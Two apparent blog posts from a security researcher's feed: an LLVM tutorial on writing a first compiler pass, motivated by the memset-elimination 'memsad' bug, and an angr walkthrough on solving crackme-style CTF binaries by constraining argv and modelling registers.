A motivating factor for security folk like me is the advent of nifty security bugs in code that stem from compiler optimizations. One really good example is a bug termed "memsad". The key issue here is applying aggressive optimizations to certain contexts of the memset call (Illja Van Sprundel from IOActive originally showed me this bug, defo check out what he has to say [<a href="https://media.ccc.de/v/35c3-9788-memsad">https://media.ccc.de/v/35c3-9788-memsad</a>]).<br />
<br />
What we learned here is that optimizations can actually remove <span style="font-family: "courier new" , "courier" , monospace;">memset</span> calls that could be used to clear cryptographic materials from memory. The <span style="font-family: "courier new" , "courier" , monospace;">memset</span> optimization can culminate in almost heart-bleed like conditions, directly compromising cryptographic operations if they go unchecked for too long or appear in too many contexts. <br />
<br />
To clarify what I'm talking about here's a potential example of memsad in something called RIOT-OS:<br />
<br />
<script src="https://gist.github.com/kh3m616/dafd200de28ccb4657903fa64a1364a9.js"></script> <br />
<br />
Extract from <a href="https://github.com/RIOT-OS/RIOT/issues/10751">https://github.com/RIOT-OS/RIOT/issues/10751</a><br />
<br />
In the code above you can see the code call memset (on line 14) with a buffer as an argument, and then not use the buffer after that point just before returning. What this means in short is that GCC (<i>including some other compilers</i>) will not mark it as "in-use" after that point (after line 14) and remove the memset during optimization; correctly assuming that it has no impact on the outcome of the function. The result being that in the code actually being run, the memset will not be called.<br />
<br />
Of course if that buffer happens to hold a hash of something sensitive or a private key, this means taht when the function returns these values will be available in memory; potentially leaked out to disk during swaps or divulged during any number of kernel memory disclosure vulnerabilities. Either way if you are serious about controlling access to your crypto, this bug can be a big problem because means you no longer have a solid grasp of where exactly in your org cryptographic materials are accessible. <br />
<br />
Anyway the point I'm trying to make here is that the internals of a compiler matter in a security sense. The existance of this bug, immediately means other examples exist, at the least as more contrived examples of this one. And in order to get a view of where these bugs come from obviously that means either trudging through unfriendly compiler code or hooking into a framework specifically designed to give you purchase on the internals of the compiler, LLVM is trying to be this framework.<br />
<br />
In order to invoke some of the magic of LLVM one can write "passes" using the nifty API LLVM forwards. The next section discusses some background on these passes and gets you going with your first one. <br />
<h2 style="text-align: left;">
Your first Pass</h2>
To start, I should say that compilers don't do everything in a single run
at your code (<i>well at least LLVM doesn't</i>), most compilers resort to a simple strategy of do things in separate "passes" over the code. This effectively
means that it will pass over the code once to achieve a certain goal and then when a desired property emerges from the code (<i>like provably correct syntax, efficient array look ups, etc</i>) it will be hit with more passes
until it is rendered into compiled machine code (<i>or LLVM bit code if thats your target</i>).<br />
<br />
LLVM gives you access to these passes via something called the <b>LLVM Pass Framework</b> (<i>documentation linked below</i>). The way this works is you write an instance of of the <span style="font-family: "courier new" , "courier" , monospace;">llvm::Pass</span> class with methods that get called during each of the instantiated pass types and you get to tell it what to do with the code! Pretty cool right? You are literally writing a compiler here, and if that doesn't get you laid then I dunno what will.<br />
<br />
Anyway here's a list of some of the passes LLVM has APIs for:<br />
<ul style="text-align: left;">
<li><b>Module Pass</b> - When you write a module pass your methods will trigger in a context that gives you view of the entire script (a .c/c++ file) being processed as a single unit. Whats neat about the Module Pass is that you can trigger analysis on functions from the Module Pass, in know this sounds redundant but imagine trying to process function semantics and say, needing context of the global variables, or seeking to optimize FunctionPass specific stuff by triggering some analysis from view of the entire script first i.e <i>setting up your shadow memory manager, collecting metrics on the module etc. </i></li>
<li><b>Function Pass</b> -the function pass as the name indicates triggers on Functions as stand alone units, this is obviously very useful functions are where the action happens! There are some caveats though to using these though because of the out of order mode of processing, you shouldn't expect to hit each function in your pass in a given order or depend any analysis on it. More important caveats are mentioned on the LLVM site (check out "Writing an LLVM Pass" in the reference section).</li>
<li><b><b>Loop Pass</b> - </b>Loop Passes run on you guessed it loop definitions<b> </b>in context. It actually processes nested loops starting from the inward out, meaning the last loop in a collection of nested loops will be the outer-most one i,e, loop A{ loop B { loop C} } will be processed C->B->A. These passes are great for performing quick optimizations on loops for instance if you're loooking for any code that may have interesting cache behaviour, you can whip up a loop pass and model for instance what the cache would look like during loop. Other more obvious applications could be things like simplifying array operations, removing statements that don't affect computation or slow down loop speed. </li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp9kyQ2UItJP-0FKmTZ48mq72BmqjhpMH6Bm32MWDLObyZ6V8CZ8YE2hHYzTGguIkBFEsxyjGoTb29iel4KZ0p-O8g5U974eYFNH0z_G0gpe6iPlfbBZfdenbDBGGx-QAnPSJypJj4Zg0/s1600/llvm+hiearchy.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="488" data-original-width="379" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp9kyQ2UItJP-0FKmTZ48mq72BmqjhpMH6Bm32MWDLObyZ6V8CZ8YE2hHYzTGguIkBFEsxyjGoTb29iel4KZ0p-O8g5U974eYFNH0z_G0gpe6iPlfbBZfdenbDBGGx-QAnPSJypJj4Zg0/s400/llvm+hiearchy.png" width="310" /></a></div>
<br />
<br />
There are a few other very powerful pass types I'm not mentioning here for the sake of brevity namely the <i>RegionPass</i>, <i>CallGraphSCCPass</i> and the <i>MachineFucntionPass</i>, if you need the <i>deets</i> on these I suggest checking out the LLVM documentation in the reference section.<br />
<br />
The general pattern to employing LLVM to do stuff is having one part of your code collect data and another analyze data. For instance lets say you're looking for use-after-free's you could have on part of your code tag and log all the calls to free() and another collecting these contexts to see if there are any funky things going on. Point I'm making here is there is usually a collection phase and an analysis phase loosely speaking. <i>For us these will be a bit compressed in our first example pass because we're just going to spit out all the function calls and make LLVM tell us the name of the function being called.</i><br />
<br />
<h2 style="text-align: left;">
The Code</h2>
<br />
Here's the code for our first LLVM pass, don't fret I'll explain whats going on right after the code snippet:<br />
<br />
<script src="https://gist.github.com/kh3m616/12f6601f0cdf839d42663876a650a760.js"></script><br />
<br />
Lines 1-6 are pretty straight forward they just make sure all the relevant namespaces and function definitions are accounted for, more important to discuss is the code on line 9:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span class="pl-k">9 struct</span> <span class="pl-en">FunctionNamePass</span> : <span class="pl-k">public</span> <span class="pl-en">FunctionPass</span> {</b></span><br />
<br />
Here we are declaring what kind of pass we want and what our instance should be called, namely we're writing a pass of type llvm::<span style="font-family: "courier new" , "courier" , monospace;">FunctionPass</span> called "FunctionNamePass". If you'd like to check out the documentation for the <span style="font-family: "courier new" , "courier" , monospace;">FunctionPass</span> class its available here ().<br />
<br />
Moving on we then give it an ID member field so the LLVM Pass framework can uniquely identify it. Then finally in line 13-16 we implement the <span style="font-family: "courier new" , "courier" , monospace;">llvm::FunctionPass::runOnFunction(Function *)</span> which is the star of the show as far as getting stuff done goes. <i>This function is where you put all the analysis you want to do, pull out function calls, check arguments etc etc</i>. The argument stuffed in here is a pointer to a Function type, which is the current function being analyised. In line 14 we can see the code do the following:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span class="pl-c1">14 errs</span>() << <span class="pl-s"><span class="pl-pds">"</span>[*] function '<span class="pl-pds">"</span></span> << F.<span class="pl-c1">getName</span>() << <span class="pl-s"><span class="pl-pds">"</span>'<span class="pl-cce">\n</span><span class="pl-pds">"</span></span>;</b></span><br />
<br />
Which is a contrived way of printing to stderr (via the <b><span style="font-family: "courier new" , "courier" , monospace;">errs()</span></b> call) , and calling getting the function name with the nifty <span style="font-family: "courier new" , "courier" , monospace;"><b>Function::getName()</b> </span>method.<br />
<br />
We now have a defined runOnFunction method and we can move onto registering our pass so that clang can pick it up. We're doing this so that we can use the <b><span style="font-family: "courier new" , "courier" , monospace;">clang -Xclang -load -Xclang</span></b> command (<i>more detail on this in the next section</i>) to invoke our pass, though there is an alternative way discussed near the end of the post. Doing things this way makes the story a little shorter and easier to understand. So how do we get clang to see and invoke our pass automatically? We make use of LLVM's Pass registration.<br />
<br />
Here's the code that registers our Pass (lines 24-30):<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">24 static void registerFunctionNamePass(const PassManagerBuilder&, legacy::PassManagerBase &PM) {</span></b><br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;"> PM.add(new FunctionNamePass());</span></b><br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">}</span></b><br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;">28 static RegisterStandardPasses</span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">RegisterMyPass(PassManagerBuilder::EP_EarlyAsPossible,</span></b><br />
<b><span style="font-family: "courier new" , "courier" , monospace;">registerFunctionNamePass); </span></b><br />
<br />
Above we can see the <span style="font-family: "courier new" , "courier" , monospace;">registerFunctionNamePass</span> which is a call back we are defining that will register our pass for us, you can name this anything of course, the important thing is that it stuffs an instance of our pass in the <span style="font-family: "courier new" , "courier" , monospace;">legacy::PassManagerBase::add( ) </span>function. Next we need to pass our registration call back to the actual pass registration system, this is done by making an instance of <span style="font-family: "courier new" , "courier" , monospace;">RegisterStandardPass</span> in line 28.<br />
<br />
Okay so that pretty much makes up all the important aspects of the pass, we can move onto compiling and running it, this is dicussed in the next section.<br />
<h2 style="text-align: left;">
Compiling and Running </h2>
Okay so our pass is all scripted up we need to be able to build and run it. To get that done we're gonna need to setup a folder structure and some CMakeLists.txt's. To skip all the headache involved in this I suggest checking out a repo that has all of this already pre-cooked, I relied on this repo by Adrian Sampson <a href="https://github.com/sampsyo/llvm-pass-skeleton">https://github.com/sampsyo/llvm-pass-skeleton</a>.<br />
<br />
CMakeLists.txt will expect to appear with a folder named FunctionName (this is what we are renaming Skeleton.cpp to) in its path like so:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">llvm-skeleton-pass</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">├── CMakeLists.txt<br />├── FunctionName<br />│ ├── CMakeLists.txt<br />│ └── FunctionName.cpp</span><br />
Where the top level llvm-skeleton-pass/CMakeLists.txt looks as follows:<br />
<br />
<script src="https://gist.github.com/kh3m616/e61f04c89a60fc8e47edec1d90654ea5.js"></script><br />
<br />
And the sub-level on under FunctionName/CMakeLists.txt looks like this:<br />
<br />
<br />
<script src="https://gist.github.com/kh3m616/02ed416b6859722a31cdd641ad108193.js"></script><br />
<br />
Once your folders are set up good, you can make your build folder and pump out some cmake and make action:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">cd llvm-pass-skeleton</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">mkdir build</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cd build</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cmake ..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">make</span><br />
<br />
If everything goes well you should see the following output:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">>$ cmake ..<br />-- The C compiler identification is GNU 9.2.1<br />-- The CXX compiler identification is GNU 9.2.1<br />-- Check for working C compiler: /usr/bin/cc<br />-- Check for working C compiler: /usr/bin/cc -- works<br />-- Detecting C compiler ABI info<br />-- Detecting C compiler ABI info - done<br />-- Detecting C compile features<br />-- Detecting C compile features - done<br />-- Check for working CXX compiler: /usr/bin/c++<br />-- Check for working CXX compiler: /usr/bin/c++ -- works<br />-- Detecting CXX compiler ABI info<br />-- Detecting CXX compiler ABI info - done<br />-- Detecting CXX compile features<br />-- Detecting CXX compile features - done<br />-- Configuring done<br />-- Generating done<br />-- Build files have been written to: /home/kh3m/Research/llvm/tutorials/llvm-passes/build</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">>$ make<br />Scanning dependencies of target FunctionNamePass<br />[ 50%] Building CXX object FunctionName/CMakeFiles/FunctionNamePass.dir/FunctionName.cpp.o<br />[100%] Linking CXX shared module libFunctionNamePass.so<br />[100%] Built target FunctionNamePass</span><br />
<br />
We can then run it by invoking the following command:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>>$ clang -Xclang -load -Xclang FunctionName/libFunctionNamePass.so</b> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;">../radamsa.c </span><br />[*] function 'main'<br />[*] function 'find_heap'<br />[*] function 'setup'<br />[*] function 'load_heap'<br />[*] function 'vm'<br />[*] function 'onum'<br />[*] function 'read_heap'<br />[*] function 'heap_metrics'<br />[*] function 'get_obj_metrics'<br />[*] function 'get_nat'<br />[*] function 'set_signal_handler'<br />[*] function 'signal_handler'<br />[*] function 'decode_fasl'<br />[*] function 'get_obj'<br />[*] function 'get_field'<br />[*] function 'mkraw'<br />[*] function 'gc'<br />[*] function 'mkpair'</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">... </span><br />
<br />
<i>You may not have a radamsa.c in your folder, any C code should suffice I just like using radamsa because its standalone, doesn't have any complex dependencies and comes packed with all kinds of crazy code to test on. </i><br />
<br />
Alternatively you can invoke your pass by using opt which is the way the LLVM documentation does it, more on that method here: <a href="https://llvm.org/docs/WritingAnLLVMPass.html#running-a-pass-with-opt">https://llvm.org/docs/WritingAnLLVMPass.html#running-a-pass-with-opt</a> <br />
<br />
Okay I think this is a good place to end this post, we will carry on adding stuff to or Pass as the series goes on so stay tuned! <br />
<h2 style="text-align: left;">
References and Futher Reading</h2>
<ol style="text-align: left;">
<li>LLVM For Grad Students - <a href="https://www.cs.cornell.edu/~asampson/blog/llvm.html">https://www.cs.cornell.edu/~asampson/blog/llvm.html</a> </li>
<li>Static Single Assignment (wikipedia) - <a href="https://en.wikipedia.org/wiki/Static_single_assignment_form">https://en.wikipedia.org/wiki/Static_single_assignment_form</a> </li>
<li>llvm::Pass Class Reference abstract - <a href="https://llvm.org/doxygen/classllvm_1_1Pass.html">https://llvm.org/doxygen/classllvm_1_1Pass.html</a></li>
<li>RIOT-OS <a href="https://github.com/RIOT-OS/RIOT/blob/master/sys/crypto/helper.c#L38-L44">https://github.com/RIOT-OS/RIOT/blob/master/sys/crypto/helper.c#L38-L44</a></li>
<li> Memsad why clearing memory is hard. (CCC, 2018) - <a href="https://media.ccc.de/v/35c3-9788-memsad">https://media.ccc.de/v/35c3-9788-memsad</a></li>
<li>LLVM: A Compilation Framework forLifelong Program Analysis & Transformation (2014) - <a href="https://llvm.org/pubs/2004-01-30-CGO-LLVM.pdf">https://llvm.org/pubs/2004-01-30-CGO-LLVM.pdf</a> </li>
<li>The most dangerous function in the C/C++ world (2015) - <a href="https://www.viva64.com/en/b/0360/">https://www.viva64.com/en/b/0360/</a> </li>
<li>2019 EuroLLVM Developers’ Meeting: V. Bridgers & F. Piovezan “LLVM IR Tutorial - Phis, GEPs ...” - <a href="https://www.youtube.com/watch?v=m8G_S5LwlTo">https://www.youtube.com/watch?v=m8G_S5LwlTo</a> </li>
<li>Loop Optimization Framework - https://arxiv.org/pdf/1811.00632.pdf </li>
<li>LLVM Skeleton Pass (Adrian Sampson) - <a href="https://github.com/sampsyo/llvm-pass-skeleton">https://github.com/sampsyo/llvm-pass-skeleton</a> </li>
</ol>
<br />
<br />
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-5151313503608480532019-12-31T10:37:00.000-08:002019-12-31T10:52:37.661-08:00[Symbolic Execution 0x1] Modeling registers and setting constraints<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
Hi folks, in the previous post I covered a simple example showing how Angr can speed up solving keygen / crackme type challenge. In this one I'm covering an explanation of how symbolic modeling of registers works with Angr and throwing in a weird little problem that required argv constraints to solve.<br />
<br />
If you're joining us at this post and find yourself a little lost, then please check out the previous one in the series available here:<br />
<br />
<ul style="text-align: left;">
<li><a href="https://blog.k3170makan.com/2019/12/symbolic-execution-0x0-solving-easy.html">[Symbolic Execution 0x0] Solving Easy CTFs with Angr and Symbolic Execution</a></li>
</ul>
<div>
In the series I'm covering some tricks you can pull of with Angr to model execution states and get some quick solutions to a few novel CTF challenges. As for this post; we move on to modeling register values as part of our initial state and setting constraints on argv or any parameter as part of a solution or initial state.<br />
<br />
<br />
I'm finding that the key to getting really good at Angr is learning the different parts of its vocabulary for describing execution states, it provides ton's of ways to setup an execution state at an arbitrary place in a binary and then crunch away until exhausts all the potential value for the variables you mark of in the "equation". Obviously the more obscure an execution state you can describe using Angr the better you'll be able to apply to Malware, Rootkits or other contrived binaries.</div>
<h3 style="text-align: left;">
Setting Constraints with Angr</h3>
<div>
<div>
As we know by now the aim of the game is to describe an execution state that models our targeted place in the binary, part of the power you have over this initial state is placing constraints on the values we want to search through for our solution. The following example shows just that for the argument passed to a binary via argv.</div>
</div>
<div>
<br /></div>
<div>
To start, here's what our binary looks like:</div>
<div>
<br /></div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgACGAkZ1HfyIiivQSedIbELjazcqUjzomGLoW2EuW8QUWMQlEtJ8iMFYIAAHdFjrcx4QAK9AjPPdhm_HgbODmuRxX-62JmF8bX790PfXs1lKnRz9BFcgB8hS5iLEp8eZ9__s1T2ytL-FI/s1600/Screenshot+from+2019-12-31+08-28-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="868" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgACGAkZ1HfyIiivQSedIbELjazcqUjzomGLoW2EuW8QUWMQlEtJ8iMFYIAAHdFjrcx4QAK9AjPPdhm_HgbODmuRxX-62JmF8bX790PfXs1lKnRz9BFcgB8hS5iLEp8eZ9__s1T2ytL-FI/s1600/Screenshot+from+2019-12-31+08-28-57.png" /></a>
<br />
<br />
Ensuring we are on the same page with the analysis, what you should note is:<br />
<br />
<br />
<ul style="text-align: left;">
<li>First couple instructions <span style="font-family: Courier New, Courier, monospace;">@0x6d2</span> and <span style="font-family: Courier New, Courier, monospace;">@0x6d5</span> pull the argv pointer and the value for argc. It then checks that we have at most (jg instruction<span style="font-family: Courier New, Courier, monospace;"> 0x6dd</span>) 1 argument.</li>
<li>The next code block of interest <span style="font-family: Courier New, Courier, monospace;">@0x6f5</span> ensures that the <span style="font-family: Courier New, Courier, monospace;">argv[1]</span> value is a string of length 5</li>
<li>Then the most crucial check for the purpose of our example happens: <span style="font-family: Courier New, Courier, monospace;">0x718</span> to <span style="font-family: Courier New, Courier, monospace;">0x72c</span> we can see that the binary ensures that: the first character value of the<span style="font-family: Courier New, Courier, monospace;"> argv[1]</span> string is less than <span style="font-family: Courier New, Courier, monospace;">0x40 - 1</span>; which implies then that its looking for <span style="font-family: Courier New, Courier, monospace;">0x3F</span> as a character value.</li>
</ul>
Then it does some weird crap with the <span style="font-family: Courier New, Courier, monospace;">argv[1] </span>string from lines <span style="font-family: Courier New, Courier, monospace;">0x738 </span>to<span style="font-family: Courier New, Courier, monospace;"> 0x77b</span>, finally making decision (based on <span style="font-family: Courier New, Courier, monospace;">eax</span>) if we win or not. Again, because of the magic of Angr we can ignore the entire code block and focus solely on the fact that:<br />
<br />
<ol style="text-align: left;">
<li>It's a "function" of <span style="font-family: Courier New, Courier, monospace;">rbp-0x10 </span>or <span style="font-family: Courier New, Courier, monospace;">argv[1]</span> value.</li>
<li>It requires some attributes to be met for <span style="font-family: Courier New, Courier, monospace;">argv[1]</span> if we are to reach the "weird crap".</li>
</ol>
<br />
We now know enough to model an execution state that will solve for the <span style="font-family: Courier New, Courier, monospace;">argv[1]</span> value.Here's how you do it:<br />
<br />
<script src="https://gist.github.com/k3170makan/e01ee70ec1b99b22be36e5fc53d218fa.js"></script>
<br />
If you've been working through some Angr examples yourself you shouldn't need a detailed breakdown of every line, I'm not going to bloat this post by reworking through them either, if you need the catch up work, please check out the previous post. The one addition you can see here though is in line 14:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">initial_state.add_constraints(argv.get_byte(0) == 0x3F)</span><br />
<br />
To spare you the mystery this ensures that whatever value's it trudges through for our ear-marked <span style="font-family: Courier New, Courier, monospace;">argv[1] </span>variable; the first byte will be hard set to <span style="font-family: Courier New, Courier, monospace;">0x3F</span>.<br />
<br />
Constraints like this can really speed up your search and avoid Angr running through tons of options that will never produce a solution; so if you're in the business of solving problems quickly and you'd like to show of your skills with Angr (<i>especially because it runs in python</i>); look out for obvious checks like this, every single character your can squeeze out as an optimization will save you a butt load of time!<br />
<br />
Okay so you probably don't believe me that this will find the solution, I need provide hard proof! Here's the run:<br />
<div>
<br /></div>
<div class="separator" style="clear: both; font-size: medium; font-weight: 400; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-uVjSkJMo31fmaNaAgZtB2E1OuoUboqhHa8VxuUzWRxldjaihlAOituL6AhJxUxCi3tIadwdp0nMxquLp9NDAuIEtp-S2vjQBIT2bl5b4nMjczPxIu3joGnKjbS4bKHlxxROtK4L5Whk/s1600/Screenshot+from+2019-12-31+08-53-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="146" data-original-width="745" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-uVjSkJMo31fmaNaAgZtB2E1OuoUboqhHa8VxuUzWRxldjaihlAOituL6AhJxUxCi3tIadwdp0nMxquLp9NDAuIEtp-S2vjQBIT2bl5b4nMjczPxIu3joGnKjbS4bKHlxxROtK4L5Whk/s1600/Screenshot+from+2019-12-31+08-53-38.png" /></a></div>
<div>
<br />
<i>I know super obscure value lol and I'm not even sure if the designer of the problem meant for this very strange value to be the actual solution - but that might not matter because the binary clearly likes it and it definitely gets us the flag!</i><br />
<br />
Quite a random place to start but I though it eased us into things well, a slightly more complex example follows.<br />
<div style="font-size: medium; font-weight: 400;">
<br /></div>
</div>
<h3>
</h3>
<h3>
Modeling Registers</h3>
Registers are an import part of calling conventions. What this means is depending on how you model, and to what fine a grain you'd like to model a binary, registers will frequently play a huge role in which function gets a certain argument.<br />
<br />
To start off, lets look at our example binary:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMm0JmGk9pEYafjxYEU4wPJEE0WjfphQX0uVMrUoMGwJRyrQ7-2D0_3Qi8_JJ5dUrmSgUGLk1ONA4ISCY59WlmBItfc9Rh6BeCZKh1xJpPueupPCUu-s-55BPyu16ai8g0F6YquNGaD3c/s1600/Screenshot+from+2019-12-31+09-19-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="486" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMm0JmGk9pEYafjxYEU4wPJEE0WjfphQX0uVMrUoMGwJRyrQ7-2D0_3Qi8_JJ5dUrmSgUGLk1ONA4ISCY59WlmBItfc9Rh6BeCZKh1xJpPueupPCUu-s-55BPyu16ai8g0F6YquNGaD3c/s1600/Screenshot+from+2019-12-31+09-19-41.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
and to expand on the <span style="font-family: "courier new" , "courier" , monospace;">get_user_input</span> function:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3xJsSOYZhh7O3bglPrrAf0PAoVIycQP7iPsFvfS1kTDxRrL51DJyAhL9eYli-3V1VXukMSQwzVW5IBwtjsJrMokwFcVmRiTAwo7cVI65nqYVzhHNzC39jK0NctSyL9fTR7y1mFFrhrBk/s1600/Screenshot+from+2019-12-31+09-19-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="320" data-original-width="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3xJsSOYZhh7O3bglPrrAf0PAoVIycQP7iPsFvfS1kTDxRrL51DJyAhL9eYli-3V1VXukMSQwzVW5IBwtjsJrMokwFcVmRiTAwo7cVI65nqYVzhHNzC39jK0NctSyL9fTR7y1mFFrhrBk/s1600/Screenshot+from+2019-12-31+09-19-59.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<i>This one comes straight from the examples Angr provides and as boring as it is to use this an example; I hafta admit the examples they provide are good, they are even provided in some form of a grammar; so you can work out how to grow more examples from the one's the Angr folks provide (those of you dedicated mastering this will appreciate that). It does mean you will be able to get these explanations from other posts but the upside is: it also gives you different working and explanations for the same stuff, and often that redundancy really helps speed up cracking the strange enigmas involved in understanding symbolic execution (or anything for that matter!). </i><br />
<br />
Analyzing our binary we see the following important things:<br />
<ul style="text-align: left;">
<li>After getting the values via <span style="font-family: "courier new" , "courier" , monospace;">scanf</span>, in lines <span style="font-family: "courier new" , "courier" , monospace;">0x8048934</span> to <span style="font-family: "courier new" , "courier" , monospace;">0x8048944</span> it transfers them via the pointer arguments given to <span style="font-family: "courier new" , "courier" , monospace;">scanf</span>, to the registers <span style="font-family: "courier new" , "courier" , monospace;">eax</span>,<span style="font-family: "courier new" , "courier" , monospace;">ebx</span> and <span style="font-family: "courier new" , "courier" , monospace;">edx</span>.</li>
<li>In the main,<i> </i>after it calls <span style="font-family: "courier new" , "courier" , monospace;">get_user_input</span> it transfers the register values <span style="font-family: "courier new" , "courier" , monospace;">eax</span>,<span style="font-family: "courier new" , "courier" , monospace;">ebx</span> and <span style="font-family: "courier new" , "courier" , monospace;">edx</span> to memory pointers, from line <span style="font-family: "courier new" , "courier" , monospace;">0x8048980</span> to <span style="font-family: "courier new" , "courier" , monospace;">0x8048986</span></li>
<li><span style="font-family: inherit;">We can also see that at line </span><span style="font-family: "courier new" , "courier" , monospace;">0x804898c</span> the binary passes the <span style="font-family: "courier new" , "courier" , monospace;">eax</span> value to <span style="font-family: "courier new" , "courier" , monospace;">complex_function_1</span>, in the same suite the <span style="font-family: "courier new" , "courier" , monospace;">ebx</span> and <span style="font-family: "courier new" , "courier" , monospace;">edx</span> are passed to <span style="font-family: "courier new" , "courier" , monospace;">complex_function_2</span> and 3 respectively (at line <span style="font-family: "courier new" , "courier" , monospace;">0x804899f</span> and <span style="font-family: "courier new" , "courier" , monospace;">0x80489b2</span>).</li>
</ul>
<div>
Skipping some unsurprising analysis, <span style="font-family: "courier new" , "courier" , monospace;">complex_function_1,2</span> and <span style="font-family: "courier new" , "courier" , monospace;">3</span> are crucial in determining our success and they are obviously functions of our <span style="font-family: "courier new" , "courier" , monospace;">eax</span>,<span style="font-family: "courier new" , "courier" , monospace;">ebx</span> and <span style="font-family: "courier new" , "courier" , monospace;">edx</span> registers. We also probably don't need to model the memory pointer's themselves since they caught nice and neatly by 3 separate registers.<br />
<br />
We want to therefore use Angr to model these registers while avoid involving ourselves with the internals of <span style="font-family: "courier new" , "courier" , monospace;">scanf</span> or any unnecessarily stack pointer/memory politics (<i>thanks to other blog posts on this subject, see "reading and references"</i>). </div>
<div>
<br />
Here's our solution script:<br />
<script src="https://gist.github.com/k3170makan/10ed0aaf6a16ffde11bc05dc4fc88ae2.js"></script>
<br />
<br />
We can see some new hotness in the script in lines 16-18:<br />
<br />
<span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">init_state.regs.eax </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">=</span><span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;"> arg0</span><br />
<span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">init_state.regs.ebx </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">=</span><span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;"> arg1</span><br />
<span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">init_state.regs.edx </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">=</span><span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;"> arg2</span><br />
<span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; font-size: 12px; white-space: pre;"><br /></span>
<br />
Pretty straight forward here, it gives the initial state a heads up and ties some <span style="font-family: "courier new" , "courier" , monospace;">claripy</span> bit vector values to the registers mentioned. This is a very simple example and doesn't involve much drama except for the analysis needed to spot the registers we need to target.<br />
<br />
And as for the proof:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG4q_PbQu7fAhVx_tHg9DrFlVwVkk_ErWfguxh74lLkK1iwKF7ais7mKCgo0NV00xGzaQ2GGDK6R0eB2b7OuXetedbp_xNBstLzwjvC2qEptrhGyE-uDOXaipYxbguwmT0JVM0eG90u0I/s1600/Screenshot+from+2019-12-31+10-26-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="159" data-original-width="793" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG4q_PbQu7fAhVx_tHg9DrFlVwVkk_ErWfguxh74lLkK1iwKF7ais7mKCgo0NV00xGzaQ2GGDK6R0eB2b7OuXetedbp_xNBstLzwjvC2qEptrhGyE-uDOXaipYxbguwmT0JVM0eG90u0I/s1600/Screenshot+from+2019-12-31+10-26-11.png" /></a></div>
<br />
<br />
<br /></div>
Gets to the right solution! Anyway that's it for this one look out for more Angr goodness in future posts.<br />
<br />
<h3 style="text-align: left;">
